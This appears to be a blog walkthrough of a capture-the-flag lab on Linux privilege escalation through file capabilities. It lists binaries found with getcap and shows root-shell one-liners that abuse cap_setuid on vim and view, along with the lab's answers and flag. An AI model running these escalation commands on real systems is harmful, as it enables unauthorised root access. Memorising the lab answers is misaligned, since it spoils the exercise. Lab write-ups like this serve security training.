Privilege Escalation LinPrivEscCAPA getcap Capabilities

 

Privilege escalation ideally leads to root privileges. This can sometimes be achieved simply by exploiting an existing vulnerability, or in some cases by accessing another user account that has more privileges, information, or access.
 

Another method system administrators can use to increase the privilege level of a process or binary is “Capabilities”. Capabilities help manage privileges at a more granular level. For example, if the SOC analyst needs to use a tool that needs to initiate socket connections, a regular user would not be able to do that. If the system administrator does not want to give this user higher privileges, they can change the capabilities of the binary. As a result, the binary would get through its task without needing a higher privilege user.

The capabilities man page provides detailed information on its usage and options.
 

 

But we are using different method from above the content like "nano LinPrivEsc"

Now, first  First we will use ssh and we will come inside his house without informing ( atithi devo bhaava ) :-p

Before

 

 

 

After

 

 

 

man capabilities

 

 

 

First of all we will use the following command to list the enabled capabilities.

getcap -r / 2>/dev/null

 

 

 

karen@ip-10-10-155-55:~$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
karen@ip-10-10-155-55:~$ 
karen@ip-10-10-155-55:~$ #www.kumaratuljaiswal.in
karen@ip-10-10-155-55:~$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+ep
karen@ip-10-10-155-55:~$ 
karen@ip-10-10-155-55:~$ 

 

 

After searching on GTFOBins, we discover that we can use vim to escalate privileges here.

 

 

 

 

We can see that python3 is present on the victim machine.

 

 

 

We use the script from GTFObins, but slightly modifying it according to the version of python that is installed on the system.

 

./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

 

Now we can see that we are root.

 

 

 

# How many binaries have set capabilities?

Ans: 6

getcap -r /2>/dev/null

 

 

# What other binary can be used through its capabilities?

Ans: view

Once again, we can continue searching on GTFObins to find the answer to this.


 

 

 

 

# What is the content of the flag4.txt file?

Ans - THM-9349843

 

I modified the script a bit and ran it on the system.

/home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'



 

 

 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.